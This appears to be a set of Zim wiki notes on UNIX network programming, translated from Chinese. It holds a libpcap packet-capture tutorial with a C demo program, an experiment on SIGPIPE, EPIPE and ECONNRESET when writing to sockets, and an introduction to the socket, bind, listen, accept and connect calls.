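(8 bytes inserted) destination address (6 bytes) -> source address (6 bytes) -> type (2 bytes) -> data (46-1500 bytes) -> FCS (4 bytes)
An Ethernet address is a 48-bit binary value, the familiar MAC address or hardware address. The MAC frame is preceded by 8 bytes of preamble and start-of-frame delimiter; the header information such as the addresses comes after that. After the destination and source addresses comes the 2-byte type field, which holds the upper-layer protocol type of the data carried in the frame. RFC 1700 specifies these values:
ETHER TYPES (hex)    PROTOCOLS
0800                 IP
0806                 ARP
8035                 Reverse ARP
809B                 AppleTalk
8137/8138            Novell
814C                 SNMP
The data portion of a frame is 46-1500 bytes long; when it is shorter than 46 bytes, a padding field of a whole number of bytes is appended. The FCS (Frame Check Sequence) on Ethernet normally uses a cyclic redundancy check (CRC).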
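As a rough illustration of the frame layout above, the 14-byte header (destination, source, type) can be picked apart from a raw byte buffer like this. The struct eth_header_view and parse_eth_header() names are hypothetical and are not the ether_header structure from the system headers; the buffer is assumed to start at the destination address, after the preamble.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical decoded view of an Ethernet V2 header. */
struct eth_header_view {
    uint8_t dst[6];        /* destination MAC address */
    uint8_t src[6];        /* source MAC address */
    uint16_t ether_type;   /* upper-layer protocol, in host byte order */
};

/* Returns 0 on success, -1 if the buffer is shorter than the 14-byte header. */
int parse_eth_header(const uint8_t *frame, size_t len, struct eth_header_view *out)
{
    if (len < 14)
        return -1;
    memcpy(out->dst, frame, 6);
    memcpy(out->src, frame + 6, 6);
    /* The type field is big-endian on the wire. */
    out->ether_type = (uint16_t)((frame[12] << 8) | frame[13]);
    return 0;
}
```

With this view, an ether_type of 0x0800 means the payload is an IP datagram and 0x0806 means ARP.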
|
||||
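IP is the network-layer protocol, and the network-layer data unit is called an IP datagram. The concepts of IP address and domain name are skipped here; the structure of the IP datagram is:
Field                 Bytes      Description
Version               1/2        IP version, currently IPv4
IHL (header length)   1/2        Header length in 32-bit words, 5-15; usually 5 (20 bytes), at most 60 bytes
Type Of Service       1          Requested precedence and reliability of service
Total Length          2          Total length of the IP datagram
Identification        2          Number identifying the IP datagram
Flags                 3/8        Bit 1 (DF) = 0: fragmentation allowed; bit 2 (MF) = 0: last fragment, 1: more fragments follow
Fragment Offset       13/8       Position of the fragment in the original datagram
TTL                   1          Datagram lifetime; suggested value 32 seconds (in practice decremented once per hop)
Protocol              1          Upper-layer protocol
Header Checksum       2          Header checksum
Source Address        4          Sender's IP address
Destination Address   4          Receiver's IP address
Options And Padding   variable   Options, padded to a multiple of 4 bytes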
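The half-byte and bit-level fields in the table are easiest to understand from code. The sketch below decodes the fixed part of an IPv4 header from raw bytes; struct ipv4_info and parse_ipv4_header() are hypothetical names for this note, not the struct ip from netinet/ip.h used by the program later.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical decoded view of selected IPv4 header fields. */
struct ipv4_info {
    unsigned version;        /* 4 for IPv4 */
    unsigned header_len;     /* header length in bytes (IHL * 4) */
    unsigned total_len;      /* total datagram length in bytes */
    int dont_fragment;       /* DF flag */
    int more_fragments;      /* MF flag */
    unsigned frag_offset;    /* fragment offset, in 8-byte units */
    unsigned ttl;
    unsigned protocol;       /* 1 = ICMP, 6 = TCP, 17 = UDP, ... */
};

/* Returns 0 on success, -1 if the buffer is too short or not IPv4. */
int parse_ipv4_header(const uint8_t *p, size_t len, struct ipv4_info *out)
{
    if (len < 20)
        return -1;
    out->version = p[0] >> 4;              /* high half of the first byte */
    out->header_len = (p[0] & 0x0F) * 4u;  /* low half, counted in 32-bit words */
    if (out->version != 4 || out->header_len < 20 || len < out->header_len)
        return -1;
    out->total_len = ((unsigned)p[2] << 8) | p[3];
    out->dont_fragment = (p[6] >> 6) & 1;
    out->more_fragments = (p[6] >> 5) & 1;
    out->frag_offset = ((unsigned)(p[6] & 0x1F) << 8) | p[7];
    out->ttl = p[8];
    out->protocol = p[9];
    return 0;
}
```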
|
||||
The value of the protocol field matters a great deal when analysing packets; the values are:
Value   Protocol   Meaning
1       ICMP       Internet Control Message Protocol
6       TCP        Transmission Control Protocol
8       EGP        Exterior Gateway Protocol
9       IGP        Interior Gateway Protocol
17      UDP        User Datagram Protocol
|
||||
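These protocol values appear again in the program later, so keep them in mind. Next, the address resolution protocols (ARP/RARP):
Field                                       Bytes   Description
Hardware type                               2       Hardware type; 1 for Ethernet
Protocol type                               2       Upper-layer protocol type; 0800 for IP
Byte length of each hardware address        1       Length in bytes of the hardware address being queried; 6 for Ethernet
Byte length of each protocol address        1       Length in bytes of the upper-layer protocol address; 4 for IPv4
Opcode                                      2       1 = ARP request, 2 = ARP reply; 3 = RARP request, 4 = RARP reply
Hardware address of sender of this packet   6       Sender hardware address
Protocol address of sender of this packet   4       Sender IP address
Hardware address of target of this packet   6       Target hardware address
Protocol address of target of this packet   4       Target IP address
ARP/RARP is used to look up the hardware address for an IP address, or conversely the IP address for a hardware address; we will meet it when analysing packets. Next is ICMP. The familiar ping command uses this protocol. It is fairly simple: a type (1 byte), a code (1 byte), a checksum (2 bytes), a 4-byte variable part that depends on the type, and the data.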
|
||||
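At the transport layer there are two more important protocols, TCP and UDP. Both use the concept of ports to tell apart the different programs on a computer. The TCP segment header is made up as follows:
Field                 Bytes      Description
Source Port           2          Sender's port number
Destination Port      2          Receiver's port number
Sequence Number       4          Sequence number of the first byte sent in this segment
Ack Number            4          Sequence number of the next byte expected from the peer
Data Offset           1/2        Header length
Reserved              3/4        Reserved for future use
Control Bits          3/4        Control flags
Window                2          Size of the sliding window
Checksum              2          Checksum
Urgent Pointer        2          Urgent pointer
Options And Padding   variable   Optional; options and padding
TCP is used by network applications that provide services across routers, such as the WWW, e-mail, news and FTP. UDP simply adds the concept of ports on top of IP. Its structure is very simple, just an 8-byte header:
source port (2 bytes) -> destination port (2 bytes) -> length (2 bytes) -> checksum (2 bytes)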
|
||||
|
||||
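Part 2: Functions and data structures used in the program
This part introduces some of the functions and data structures used in the program below. The program uses the pcap library, which can be downloaded from
ftp://ftp.ee.lbl.gov/libpcap.tar.z. The program was tested mainly on Red Hat Linux, so only the installation of the library there is described briefly; for other environments you are on your own. The aim is to give ideas for writing a packet-analysis program, not to present a practical tool. The program in Part 3 is not practical either: for demonstration purposes it implements many features, some of them not in enough detail. When writing a real tool, trim it as appropriate and add the functionality you need. The pcap library is installed as follows:
1. Unpack the archive.
2. Enter the directory and run ./configure and make.
3. Use make to install the manual pages and include files (root privileges required) by running:
make install-man
make install-incl
4. If it complains that the include or include/net directory does not exist, create the directory and run make install-incl again.
5. Check whether Protocols.h exists in /usr/include/netinet/; if not, copy it there. The library is now installed.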
|
||||
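Some of the functions and data structures that appear in the program:
1. pcap_t *pd;
This data structure is called the packet capture descriptor.
2. pcap_open_live(argv[1], DEFAULT_SNAPLEN, 1, 1000, ebuf)
This function initialises the pcap library and returns a pointer to a pcap_t. Its parameters are:
char *    network interface to open
int       maximum number of bytes to capture per packet
int       promiscuous-mode flag, usually 1
int       read timeout in milliseconds
char *    buffer for error messages
3. pcap_loop(pd, -1, packet_proce, NULL)
This function is the core of the program. It runs repeatedly, using pcap to fetch packets. It returns 0 once the requested number of packets has been processed and -1 on error. Its parameters are:
pcap_t *       packet capture descriptor to read packets from
int            number of packets to capture; -1 means unlimited
pcap_handler   pointer to the function that processes each packet
u_char *       pointer to user data passed through to the packet-processing function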
|
||||
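4. struct ether_header *eth
This structure holds the Ethernet header. Its members are:
ether_dhost[6]   destination MAC address
ether_shost[6]   source MAC address
ether_type       upper-layer protocol type
5. fflush(stdout)
This function forces buffered output to be written; with the argument stdout it flushes standard output.
6. ntohs(((struct ether_header *)p)->ether_type)
This function converts a short integer from network byte order to host byte order. Related functions:
ntohl   long integer    same as above
htons   short integer   converts host byte order to network byte order
htonl   long integer    same as above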
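A short sketch of why the conversion is needed: the two bytes of the type field arrive most-significant byte first, and ntohs() turns them into a value the host can compare directly. read_be16() is a hypothetical helper name used only in this note.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

/* Read a 16-bit field exactly as it arrived on the wire and convert it. */
uint16_t read_be16(const unsigned char *wire)
{
    uint16_t net;
    memcpy(&net, wire, sizeof net);   /* copy the raw bytes, no reordering */
    return ntohs(net);                /* network (big-endian) to host order */
}
```

For the Ethernet type bytes 08 00 this yields 0x0800 on both little-endian and big-endian hosts, which is the value compared against the IP ether type.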
|
||||
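7. struct ip *iph
The ip structure is defined in ip.h. Its members correspond to the IP datagram structure described in Part 1:
Member   Type                      Description
ip_hl    4-bit unsigned integer    header length
ip_v     4-bit unsigned integer    version, currently 4
ip_tos   8-bit unsigned integer    type of service
ip_len   16-bit unsigned integer   datagram length
ip_id    16-bit unsigned integer   identification
ip_off   16-bit unsigned integer   fragment offset and flags
ip_ttl   8-bit unsigned integer    TTL value
ip_p     8-bit unsigned integer    upper-layer protocol
ip_sum   16-bit unsigned integer   checksum
ip_src   struct in_addr            sender's IP address
ip_dst   struct in_addr            receiver's IP address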
|
||||
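8. struct ether_arp *arph
The members of the ether_arp structure are:
Member    Type                               Description
ea_hdr    struct arphdr                      the part of the header other than the addresses
arp_sha   array of 8-bit unsigned integers   sender MAC address
arp_spa   array of 8-bit unsigned integers   sender IP address
arp_tha   array of 8-bit unsigned integers   target MAC address
arp_tpa   array of 8-bit unsigned integers   target IP address
9. struct icmphdr *icmp
The icmphdr structure contains a union whose meaning depends on the message type; it is not listed here. Only the three members common to all types are shown:
Member     Description
type       type field
code       code
checksum   checksum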
|
||||
|
||||
三、案例程序剖析
|
||||
//example.c
|
||||
//使用方法:example〈网络接口名〉 > 〈输出文件名〉
|
||||
//例如:example etho > temp.txe
|
||||
//结束方法:ctrl+c
|
||||
//Start of program: include the headers
#include<stdio.h>
#include<stdlib.h> //exit
#include<string.h> //strcpy, memcpy
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netinet/in_systm.h>
#include<netinet/ip.h>
#include<netinet/tcp.h> //struct tcphdr
#include<netinet/udp.h> //struct udphdr
#include<netinet/if_ether.h>
#include<arpa/inet.h> //ntohs, htons
#include<pcap.h> //pcap library
#include<netdb.h> //used for DNS lookups
#define MAXSTRINGSIZE 256 //string length
#define MAXSIZE 1024 //maximum number of entries in the host cache
#define DEFAULT_SNAPLEN 68 //number of bytes captured from each packet
|
||||
typedef struct
{
    unsigned long int ipaddr; //IP address
    char hostname[MAXSTRINGSIZE]; //host name
}dnstable; //cache entry
typedef struct
{
    dnstable table[MAXSIZE];
    int front;
    int rear;
}sequeue;
static sequeue cache; //queue storage; zero-initialized, so front==rear==0 (empty queue)
sequeue *sq=&cache; //the cache queue
|
||||
//Print a MAC address
void print_hwadd(u_char * hwadd)
{
    int i; //declared outside the loop because it is used after it
    for(i=0;i<5;++i)
        printf("%02x:",hwadd[i]);
    printf("%02x",hwadd[i]);
}
|
||||
//Print an IP address
void print_ipadd(u_char *ipadd)
{
    int i; //declared outside the loop because it is used after it
    for(i=0;i<3;++i)
        printf("%d.",ipadd[i]);
    printf("%d",ipadd[i]);
}
|
||||
//Look up the service name for a port
void getportname(int portno,char portna[],char* proto)
{
    struct servent *sv=getservbyport(htons(portno),proto); //look up once and reuse the result
    if(sv!=NULL)
        strcpy(portna,sv->s_name);
    else
        sprintf(portna,"%d",portno); //unknown service: fall back to the number
}
|
||||
//Convert an IP address to its DNS name, using the cache
void iptohost(unsigned long int ipad,char* hostn)
{
    struct hostent * shostname;
    struct in_addr addr;
    int m,n,i;
    m=sq->rear;
    n=sq->front;
    for(i=n%MAXSIZE;i!=m%MAXSIZE;i=(++n)%MAXSIZE)
    {
        //check whether this IP has been seen before
        if(sq->table[i].ipaddr==ipad)
        {
            strcpy(hostn,sq->table[i].hostname);
            break;
        }
    }
    if(i==m%MAXSIZE)
    {//not cached: query the name server and put the result in the cache
        if((sq->rear+1)%MAXSIZE==sq->front) //queue full?
            sq->front=(sq->front+1)%MAXSIZE; //dequeue the oldest entry
        sq->table[i].ipaddr=ipad;
        addr.s_addr=(in_addr_t)ipad; //always 4 bytes, unlike unsigned long on 64-bit systems
        shostname=gethostbyaddr(&addr,sizeof(addr),AF_INET);
        if(shostname!=NULL)
        {
            strncpy(sq->table[i].hostname,shostname->h_name,MAXSTRINGSIZE-1);
            sq->table[i].hostname[MAXSTRINGSIZE-1]='\0';
        }
        else
            strcpy(sq->table[i].hostname,"");
        strcpy(hostn,sq->table[i].hostname); //return the newly cached name to the caller
        sq->rear=(sq->rear+1)%MAXSIZE;
    }
}
|
||||
void print_hostname(u_char* ipadd)
{
    in_addr_t addr;
    char hostn[MAXSTRINGSIZE];
    memcpy(&addr,ipadd,sizeof(addr)); //copy exactly 4 address bytes; avoids an unaligned or oversized read
    iptohost((unsigned long int)addr,hostn);
    if(strlen(hostn)>0)
        printf("%s",hostn);
    else
        print_ipadd(ipadd);
}
|
||||
//Packet-processing callback
void packet_proce(u_char* packets,const struct pcap_pkthdr * header,const u_char *pp)
{
    struct ether_header * eth; //Ethernet frame header
    struct ether_arp * arph; //ARP header
    struct ip * iph; //IP header
    struct tcphdr * tcph;
    struct udphdr * udph;
    u_short srcport,dstport; //port numbers
    char protocol[MAXSTRINGSIZE]; //protocol name
    char srcp[MAXSTRINGSIZE],dstp[MAXSTRINGSIZE]; //port names
    unsigned int ptype; //protocol type
    u_char * data; //pointer to the packet payload
    u_char tcpudpdata[MAXSTRINGSIZE]; //copy of the payload
    int i;
|
||||
eth=(struct ether_header *)pp;
|
||||
ptype=ntohs(((struct ether_header *)pp)->ether_type);
|
||||
if((ptype==ETHERTYPE_ARP)||(ptype==ETHERTYPE_RARP))
|
||||
{
|
||||
arph=(struct ether_arp *)(pp+sizeof(struct ether_header));
|
||||
if(ptype==ETHERTYPE_ARP)
|
||||
printf("arp ");
|
||||
else
|
||||
printf("rarp "); //print the protocol type
|
||||
print_hwadd((u_char *)&(arph->arp_sha));
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(arph->arp_spa));
|
||||
printf(")->");
|
||||
print_hwadd((u_char *)&(arph->arp_tha));
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(arph->arp_tpa));
|
||||
printf(")\tpacketlen:%d",header->len);
|
||||
}
|
||||
    else if(ptype==ETHERTYPE_IP) //IP datagram
    {
        iph=(struct ip *)(pp+sizeof(struct ether_header));
        i=0; //nothing copied yet; also the terminator position for protocols without payload
        srcport=dstport=0;
        if(iph->ip_p==1) //ICMP message
        {
            strcpy(protocol,"icmp");
        }
        else if(iph->ip_p==6) //TCP segment
        {
            strcpy(protocol,"tcp");
            tcph=(struct tcphdr *)(pp+sizeof(struct ether_header)+4*iph->ip_hl);
            srcport=ntohs(tcph->source);
            dstport=ntohs(tcph->dest);
            data=(u_char *)(pp+sizeof(struct ether_header)+4*iph->ip_hl+4*tcph->doff);
            for(i=0;i<MAXSTRINGSIZE-1;++i)
            {
                //stop at the end of the captured bytes (caplen), not the on-wire length
                if(sizeof(struct ether_header)+4*iph->ip_hl+4*tcph->doff+i>=header->caplen)
                    break;
                tcpudpdata[i]=data[i];
            }
        } //end of TCP handling
        else if(iph->ip_p==17) //UDP datagram
        {
            strcpy(protocol,"udp");
            udph=(struct udphdr *)(pp+sizeof(struct ether_header)+4*iph->ip_hl);
            srcport=ntohs(udph->source);
            dstport=ntohs(udph->dest);
            data=(u_char *)(pp+sizeof(struct ether_header)+4*iph->ip_hl+8);
            for(i=0;i<MAXSTRINGSIZE-1;++i)
            {
                if(sizeof(struct ether_header)+4*iph->ip_hl+8+i>=header->caplen)
                    break;
                tcpudpdata[i]=data[i];
            }
        }
        else
            sprintf(protocol,"%d",iph->ip_p); //other protocols: show the protocol number
|
||||
tcpudpdata[i]='\0';
|
||||
getportname(srcport,srcp,protocol);
|
||||
getportname(dstport,dstp,protocol);
|
||||
printf("ip ");
|
||||
print_hwadd(eth->ether_shost);
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(iph->ip_src));
|
||||
printf(")[%s:%s]->",protocol,srcp);
|
||||
print_hwadd(eth->ether_dhost);
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(iph->ip_dst));
|
||||
printf(")[%s:%s]",protocol,dstp);
|
||||
printf("\tttl:%d packetlen:%d",iph->ip_ttl,header->len);
|
||||
printf("\n");
|
||||
printf("%s",tcpudpdata);
|
||||
printf("==endpacket==");
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
//main sets up the program environment and fetches packets
int main(int argc,char ** argv)
{
    char ebuf[PCAP_ERRBUF_SIZE];
    pcap_t * pd;
    if(argc<=1) //check the arguments
    {
        printf("usage:%s <network interface>\n",argv[0]);
        exit(0);
    }
    //set up the pcap library
    if((pd=pcap_open_live(argv[1],DEFAULT_SNAPLEN,1,1000,ebuf))==NULL)
    {
        (void)fprintf(stderr,"%s",ebuf);
        exit(1);
    }
    //fetch packets in a loop
    //replace -1 with another value to capture a fixed number of packets; -1 means no limit
    if(pcap_loop(pd,-1,packet_proce,NULL)<0)
    {
        (void)fprintf(stderr,"pcap_loop:%s\n",pcap_geterr(pd));
        exit(1);
    }
    pcap_close(pd);
    exit(0);
}
//End of program
|
||||
208
Zim/Programme/APUE/Socket数据发送中信号SIGPIPE及相关errno的研究.txt
Normal file
@@ -0,0 +1,208 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:36:51+08:00
|
||||
|
||||
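====== A Study of SIGPIPE and the Related errno Values When Sending Data over a Socket ======
Created Saturday 04 June 2011
I had not done any C development for a long time and have recently picked it up again.
I heard that another project team had run into a problem in their socket code: the amount of data received did not match the amount sent. They were advised to use the retry loop in writen to avoid errors caused by signal interruption, but the problem remained, so the PM asked me to look into it.
I read UNP years ago, have not done low-level development for a long time, and did not have UNP vol. 1 at hand, so I wrote a test program to see what can actually happen.

Test environment: AS3 and Red Hat 9 (nc is not installed by default)

First download the UNP source:
wget http://www.unpbook.com/unpv13e.tar.gz
tar xzvf *.tar.gz;
configure;make lib.
Then, using str_cli.c and tcpcli01.c as references, I wrote the test code client.c: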
|
||||
|
||||
|
||||
#include "unp.h"
|
||||
|
||||
#define MAXBUF 40960
|
||||
void processSignal(int signo)
|
||||
{
|
||||
printf("Signal is %d\n", signo);
|
||||
signal(signo, processSignal);
|
||||
}
|
||||
void
|
||||
str_cli(FILE *fp, int sockfd)
|
||||
{
|
||||
char sendline[MAXBUF], recvline[MAXBUF];
|
||||
|
||||
while (1) {
|
||||
|
||||
memset(sendline, 'a', sizeof(sendline));
|
||||
printf("Begin send %d data\n", MAXBUF);
|
||||
Writen(sockfd, sendline, sizeof(sendline));
|
||||
sleep(5);
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int sockfd;
|
||||
struct sockaddr_in servaddr;
|
||||
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
//signal(SIGPIPE, processSignal);
|
||||
|
||||
if (argc != 2)
|
||||
err_quit("usage: tcpcli [port]");
|
||||
|
||||
sockfd = Socket(AF_INET, SOCK_STREAM, 0);
|
||||
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_port = htons(atoi(argv[1]));
|
||||
Inet_pton(AF_INET, "127.0.0.1", &servaddr.sin_addr);
|
||||
|
||||
Connect(sockfd, (SA *) &servaddr, sizeof(servaddr));
|
||||
|
||||
str_cli(stdin, sockfd); /* do it all */
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
|
||||
To make the error output easier to observe, lib/writen.c was also modified to add some logging:
|
||||
|
||||
|
||||
|
||||
/* include writen */
|
||||
#include "unp.h"
|
||||
|
||||
ssize_t /* Write "n" bytes to a descriptor. */
|
||||
writen(int fd, const void *vptr, size_t n)
|
||||
{
|
||||
size_t nleft;
|
||||
ssize_t nwritten;
|
||||
const char *ptr;
|
||||
|
||||
ptr = vptr;
|
||||
nleft = n;
|
||||
while (nleft > 0) {
|
||||
printf("Begin Writen %zu\n", nleft);
|
||||
if ( (nwritten = write(fd, ptr, nleft)) <= 0) {
|
||||
if (nwritten < 0 && errno == EINTR) {
|
||||
printf("interrupted\n");
|
||||
nwritten = 0; /* and call write() again */
|
||||
}
|
||||
else
|
||||
return(-1); /* error */
|
||||
}
|
||||
|
||||
nleft -= nwritten;
|
||||
ptr += nwritten;
|
||||
printf("Already write %zd, left %zu, errno=%d\n", nwritten, nleft, errno);
|
||||
}
|
||||
return(n);
|
||||
}
|
||||
/* end writen */
|
||||
|
||||
void
|
||||
Writen(int fd, void *ptr, size_t nbytes)
|
||||
{
|
||||
if (writen(fd, ptr, nbytes) != nbytes)
|
||||
err_sys("writen error");
|
||||
}
|
||||
|
||||
|
||||
|
||||
client.c goes in the tcpcliserv directory. The Makefile was modified to add a build target for client.c:
|
||||
|
||||
|
||||
|
||||
|
||||
client: client.c
|
||||
${CC} ${CFLAGS} -o $@ $< ${LIBS}
|
||||
|
||||
|
||||
|
||||
Now the tests can begin.
Test 1: SIGPIPE ignored; the peer closes the receiving process before writen

Server on the local machine:
nc -l -p 30000

Client on the local machine:
./client 30000
Begin send 40960 data
Begin Writen 40960
Already write 40960, left 0, errno=0
Begin send 40960 data
Begin Writen 40960
Already write 40960, left 0, errno=0
At this point stop the server. The client then prints:
Begin send 40960 data
Begin Writen 40960
writen error: Broken pipe(32)
Conclusion: when the peer's socket has gone away before the write, write on the sending side returns -1 with errno set to EPIPE (32).
|
||||
Test 2: SIGPIPE caught; the peer closes the receiving process before writen

Modify the client code to catch SIGPIPE:

//signal(SIGPIPE, SIG_IGN);

signal(SIGPIPE, processSignal);

Server on the local machine:
nc -l -p 30000

Client on the local machine:
make client
./client 30000
Begin send 40960 data
Begin Writen 40960
Already write 40960, left 0, errno=0
Begin send 40960 data
Begin Writen 40960
Already write 40960, left 0, errno=0
At this point stop the server. The client then prints:
Begin send 40960 data
Begin Writen 40960
Signal is 13
writen error: Broken pipe(32)
Conclusion: when the peer's socket has gone away before the write, the sender's write first triggers the SIGPIPE handler, and then write returns -1 with errno set to EPIPE (32).
|
||||
|
||||
Test 3: the peer closes the receiving process while writen is in progress

To make this easier to trigger, increase the amount of data per write by changing MAXBUF to 4096000.

Server on the local machine:
nc -l -p 30000

Client on the local machine:
make client
./client 30000
Begin send 4096000 data
Begin Writen 4096000
At this point stop the server. The client then prints:
Already write 589821, left 3506179, errno=0
Begin Writen 3506179
writen error: Connection reset by peer(104)

Conclusion: when the peer's socket goes away during a socket write, the sender's write first returns the number of bytes already sent; the next write returns -1 with errno set to ECONNRESET (104).
|
||||
|
||||
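In all of the tests above the sender writes again after the peer's socket has gone away, so why do the results differ? The answer is in UNP sections 5.12 and 5.13, which I tracked down later: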
|
||||
|
||||
The client's call to readline may happen before the server's RST is received by the client, or it may happen after. If the readline happens before the RST is received, as we've shown in our example, the result is an unexpected EOF in the client. But if the RST arrives first, the result is an ECONNRESET ("Connection reset by peer") error return from readline.
|
||||
|
||||
This explains the behavior in test 3: the RST arrived while the write was in progress.
|
||||
|
||||
What happens if the client ignores the error return from readline and writes more data to the server? This can happen, for example, if the client needs to perform two writes to the server before reading anything back, with the first write eliciting the RST.
|
||||
|
||||
The rule that applies is: When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated.
|
||||
|
||||
If the process either catches the signal and returns from the signal handler, or ignores the signal, the write operation returns EPIPE.
|
||||
|
||||
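This explains the behavior in tests 1 and 2: when a process writes to a socket that has already received an RST, the kernel sends SIGPIPE to the writing process, and whether the process catches or ignores the signal, write returns the EPIPE error.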
|
||||
|
||||
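UNP therefore recommends that applications handle SIGPIPE according to their needs, or at least not leave it at the default disposition. The default action terminates the process, which makes it very hard to find out why the process exited.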
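The EPIPE rule can be reproduced in a few lines. The sketch below uses a pipe with its read end closed rather than a TCP socket that has received an RST, which is a simplification chosen so the example needs no server; the function name errno_after_write_to_closed_pipe is made up for this illustration.

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <unistd.h>

/* Write to a pipe whose read end is closed, with SIGPIPE ignored.
 * Returns the errno left by the failing write, 0 if the write
 * unexpectedly succeeds, or -1 if the pipe cannot be created. */
int errno_after_write_to_closed_pipe(void)
{
    int fds[2];
    int saved;
    void (*old)(int);

    old = signal(SIGPIPE, SIG_IGN);   /* with the default action the process would be killed */
    assert(old != SIG_ERR);
    if (pipe(fds) < 0) {
        signal(SIGPIPE, old);
        return -1;
    }
    close(fds[0]);                    /* no reader is left */
    saved = (write(fds[1], "x", 1) < 0) ? errno : 0;
    close(fds[1]);
    signal(SIGPIPE, old);             /* restore the previous disposition */
    return saved;
}
```

With SIGPIPE ignored the call returns EPIPE, matching test 1. Commenting out the first signal() call would instead terminate the process silently, which is the hard-to-diagnose exit described above.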
|
||||
|
||||
Original article: http://blog.chinaunix.net/u/31357/showart_242605.html
|
||||
|
||||
187
Zim/Programme/APUE/TCPIP编程实现远程文件传输.txt
Normal file
@@ -0,0 +1,187 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:01:46+08:00
|
||||
|
||||
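====== Remote File Transfer with TCP/IP Programming ======
Created Wednesday 20 April 2011
http://bbs.chinaunix.net/thread-2278881-1-2.html

In a TCP/IP network, to keep the network secure, administrators often add firewall rules on the routers that stop unauthorized users from reaching hosts through TCP/IP protocols with higher security risk, such as ftp. Yet system maintainers sometimes need ftp to transfer files from the host in the central machine room to hosts at the front-end branches, for example to replace or upgrade an application. Opening the firewall for every transfer is tedious; a dedicated file transfer module inside your own application is far more convenient.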
|
||||
|
||||
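UNIX network programs are generally written with the socket system calls. For the widely used client/server model, the steps are as follows:
1. The socket system call
To perform network I/O, the first thing a UNIX process on either the server or the client must do is call socket() to create a socket and specify the appropriate communication protocol. Format:
#include<sys/types.h>
#include<sys/socket.h>
int socket(int family,int type,int protocol)
where:
(1) family specifies the socket family. Values include:
AF_UNIX (UNIX internal protocols)
AF_INET (Internet protocols; use this value for TCP/IP programming)
AF_NS (Xerox NS protocols)
AF_IMPLINK (IMP link layer)
(2) type specifies the socket type. Values include:
SOCK_STREAM (stream socket)
SOCK_DGRAM (datagram socket)
SOCK_RAW (raw socket)
SOCK_SEQPACKET (sequenced packet socket)
In most cases the first two arguments together determine the protocol, and the third argument is set to 0. If the first argument is AF_INET and the second is SOCK_STREAM, the protocol is TCP; with SOCK_DGRAM the protocol is UDP; with SOCK_RAW the protocol is IP. Note that not every combination of family and type is valid; consult the relevant documentation for details. On success the call returns a value similar to a file descriptor, called a socket descriptor, on which read and write can perform I/O just as on a file descriptor. When a process has finished with the socket, it must close it with close(<descriptor>) (see below).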
|
||||
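2. The bind system call on the server
A newly created socket is not associated with any address; bind() must be called to give it one. Format:
#include<sys/types.h>
#include<sys/socket.h>
int bind(int socketfd,struct sockaddr *localaddr,int addrlen);
where:
(1) The first argument, socketfd, is the socket descriptor returned by the earlier socket() call.
(2) The second argument points to a structure holding the local address to bind. For TCP/IP it is a struct sockaddr_in (cast to struct sockaddr *), defined in sys/netinet/in.h on this system and in netinet/in.h on most current ones:
struct sockaddr_in{
    short sin_family; /*address family passed to socket(), such as AF_INET*/
    u_short sin_port; /*port number in network byte order*/
    struct in_addr sin_addr; /*network address in network byte order*/
    char sin_zero[8];
};
Each network program on a machine uses its own port number; for example, telnet uses port 23 and ftp uses port 21. When designing an application, the port number can be obtained from /etc/services with getservbyname(), or produced by converting an integer to network byte order with htons(int portnum). On most UNIX systems, port numbers below 1024 can be bound only by the superuser, so ordinary user programs should choose a port from 1024 upward (port numbers are 16 bits wide, so the upper limit is 65535). The network address can be obtained with gethostbyname(char *hostname); like getservbyname(), this function returns all data in its structures in network byte order. The hostname argument is the machine name that corresponds to a network address in /etc/hosts. The function returns a pointer to a hostent structure, defined in netdb.h:
struct hostent{
    char *h_name;
    char **h_aliases;
    int h_addrtype;
    int h_length; /*address length*/
    char **h_addr_list;
#define h_addr h_addr_list[0] /*address*/
};
(3) The third argument is the length of the structure passed as the second argument. If the call succeeds, bind returns 0; otherwise it returns -1 and sets errno.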
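Filling in the address structure before bind() or connect() can be sketched as below. This version takes a dotted-decimal string and uses inet_pton instead of gethostbyname, which is a substitution made to keep the example independent of /etc/hosts; make_ipv4_addr is a hypothetical helper name.

```c
#include <assert.h>
#include <string.h>
#include <arpa/inet.h>    /* htons, inet_pton */
#include <netinet/in.h>   /* struct sockaddr_in */
#include <sys/socket.h>

/* Fill *out with an IPv4 address and port, both in network byte order.
 * Returns 0 on success, -1 if ip is not a valid dotted-decimal address. */
int make_ipv4_addr(const char *ip, unsigned short port, struct sockaddr_in *out)
{
    assert(ip != NULL && out != NULL);
    memset(out, 0, sizeof(*out));      /* also clears sin_zero */
    out->sin_family = AF_INET;
    out->sin_port = htons(port);       /* host order to network order */
    return inet_pton(AF_INET, ip, &out->sin_addr) == 1 ? 0 : -1;
}
```

The result would then be passed as bind(s, (struct sockaddr *)&addr, sizeof(addr)).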
|
||||
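3. The listen system call on the server, which makes the server willing to accept connections
Format: int listen(int socketfd,int backlog)
It is normally called after socket and bind and before accept. The second argument specifies how many connection requests the system may queue while waiting for the server to call accept. This argument is commonly set to 5, which was also the maximum allowed on systems of that era.
4. The server calls accept to wait for a client to connect with connect. Format:
int newsocket=accept(int socketfd,struct sockaddr_in *peer,int *addrlen);
This call takes the first connection request off the queue and creates a new socket with the same properties as socketfd. If no connection request is waiting, the call blocks the caller until one arrives. After a successful connection, the call fills peer and addrlen with the peer's address structure and address length. If the client's address is of no interest, both arguments can be passed as 0.
5. The client calls connect() to establish a connection with the server. Format:
connect(int socketfd,struct sockaddr_in *servaddr,int addrlen)
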